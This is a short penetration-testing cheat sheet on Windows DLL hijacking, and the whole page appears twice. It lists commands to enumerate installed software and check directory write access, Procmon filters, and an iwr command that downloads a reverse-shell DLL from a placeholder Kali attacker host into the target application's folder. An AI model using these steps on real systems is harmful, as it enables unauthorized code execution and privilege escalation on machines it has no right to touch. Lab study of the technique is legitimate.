DLL Hijacking

Get all installed applications

Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

Research

Google search each application to see if its vulnerable to DLL hijacking

Check if can write in the application directory

echo "test" > '<Application File Path>\test.txt'
type '<Application File Path>\test.txt'

Open Procmon.exe

Apply filters

Apply the following filters

Column

Relation

Value

Action

Process Name

Include

Operation

CreateFile

Include

Path

contains

Include

Craft a payload that returns reverse shell

Shells

Download the payload into target machine

iwr -uri http://<Kali IP Address>/<DLL File Name>.dll -Outfile '<Application File Path>/<DLL File Name>.dll'

PreviousService Binary Hijacking NextUnquoted Service Paths

Last updated 23 days ago

DLL Hijacking

Get all installed applications

Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

Research

Google search each application to see if its vulnerable to DLL hijacking

Check if can write in the application directory

echo "test" > '<Application File Path>\test.txt'
type '<Application File Path>\test.txt'

Open Procmon.exe

Apply filters

Apply the following filters

Column

Relation

Value

Action

Process Name

Include

Operation

CreateFile

Include

Path

contains

Include

Craft a payload that returns reverse shell

Shells

Download the payload into target machine

iwr -uri http://<Kali IP Address>/<DLL File Name>.dll -Outfile '<Application File Path>/<DLL File Name>.dll'

PreviousService Binary Hijacking NextUnquoted Service Paths

Last updated 23 days ago